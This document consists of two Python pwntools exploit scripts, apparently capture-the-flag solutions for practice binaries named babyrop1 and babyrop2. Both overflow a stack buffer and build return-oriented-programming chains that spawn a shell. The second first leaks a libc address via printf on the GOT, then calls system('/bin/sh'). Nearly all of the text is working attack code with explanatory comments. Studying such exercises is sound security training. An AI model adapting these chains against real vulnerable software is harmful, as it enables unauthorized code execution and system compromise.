babyrop1_exploit.py
from pwn import *
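# Exploit for ./babyrop1 (non-PIE x86-64 main image, so the addresses below
# are fixed).  ROP chain: overflow the stack buffer, `pop rdi; ret` ->
# pointer to "/bin/sh", an extra `ret` for alignment, then system().
#
# Payload pieces are bytes literals so the script runs under both Python 2
# and Python 3 pwntools: on Python 3, "A" * n + p64(...) is str + bytes and
# raises TypeError.
p = process("./babyrop1")

# Binary-specific addresses; re-derive them (objdump -d / ROPgadget) if the
# binary is rebuilt.  The roles are inferred from how the chain uses them.
system = 0x400490   # target of the final return -- presumably system@plt; verify
binsh = 0x601048    # presumably a "/bin/sh" string inside the binary; verify
pr = 0x400683       # gadget used as `pop rdi; ret` (loads the first argument)
ret = 0x4004d1 if False else 0x400479  # lone `ret` gadget, used for stack realignment

# 0x10 bytes of buffer plus 8 bytes of saved rbp before the return address
# (offset taken from the original; confirm with a cyclic pattern if in doubt).
payload = b"A" * (0x10 + 8)
payload += p64(pr)      # pop rdi; ret
payload += p64(binsh)   # rdi = "/bin/sh"
payload += p64(ret)     # extra ret keeps rsp 16-byte aligned when system() is
                        # entered -- presumably needed for movaps in libc; confirm
payload += p64(system)

p.sendlineafter(b"? ", payload)
p.interactive()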
babyrop2_exploit.py
from pwn import *
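# Exploit for ./babyrop2: stage 1 leaks read()'s libc address by calling
# printf(&read@got) and returning to main; stage 2 reuses the overflow to
# call system("/bin/sh") from the leaked libc.
#
# Changes from the original listing:
#   * bytes literals throughout, so the script runs under Python 3 pwntools
#     as well as Python 2 (str + p64() bytes raises TypeError on Python 3);
#   * recvn(6) instead of recv(6): recv() returns *up to* 6 bytes, so a
#     leak arriving in pieces would be silently padded into a bogus address;
#   * a sanity check that the leaked address has read()'s page offset, which
#     catches a truncated leak or a libc that does not match the target.
p = process("./babyrop2")
e = ELF("./babyrop2")

# pwntools resolves the libc this binary would load; every offset below is
# only valid if that is the same libc the target process actually maps.
libc = e.libc
if libc is None:
    log.error("could not resolve the libc for ./babyrop2")  # raises

# Binary-specific gadgets (non-PIE main image); re-derive if rebuilt.
pr = 0x400733     # gadget used as `pop rdi; ret`
ret = 0x4004d1    # lone `ret`, used for 16-byte stack realignment
main = 0x400636   # address stage 1 returns to -- presumably main(); verify
# The original also listed one_gadget offsets (0x4f2c5, 0x4f322, 0x10a38c)
# but never used them; the chain below calls system() instead.

# 0x20-byte buffer plus saved rbp before the return address (offset taken
# from the original; confirm with a cyclic pattern if in doubt).
pad = b"A" * (0x20 + 8)

# Stage 1: printf's first argument is the GOT slot of read(), so printf
# prints the slot's bytes as a C string -- the low six non-zero bytes of
# read()'s libc address -- then the chain returns to main for a second
# overflow.
stage1 = pad
stage1 += p64(pr)
stage1 += p64(e.got["read"])
stage1 += p64(ret)                  # realign before calling printf
stage1 += p64(e.plt["printf"])
stage1 += p64(ret)
stage1 += p64(main)
p.sendlineafter(b"? ", stage1)

p.recvuntil(b"!\n")
# A canonical user-space address has two zero high bytes, so printf emits
# exactly six bytes -- unless one of the low six bytes is itself NUL, in
# which case the leak is truncated; the page-offset check below catches that.
read_addr = u64(p.recvn(6).ljust(8, b"\x00"))
if (read_addr & 0xfff) != (libc.symbols["read"] & 0xfff):
    # log.error raises PwnlibException, aborting before a bad base is used.
    log.error("leak 0x%x does not have read()'s page offset 0x%x -- "
              "truncated leak or wrong libc", read_addr, libc.symbols["read"] & 0xfff)

libc_base = read_addr - libc.symbols["read"]
system_addr = libc_base + libc.symbols["system"]
binsh = libc_base + next(libc.search(b"/bin/sh"))  # first "/bin/sh" in libc
log.info("libc base: 0x%x", libc_base)

# Stage 2: realign, then system("/bin/sh").
stage2 = pad
stage2 += p64(ret)
stage2 += p64(pr)
stage2 += p64(binsh)
stage2 += p64(system_addr)
p.recvuntil(b"? ")
p.sendline(stage2)
p.interactive()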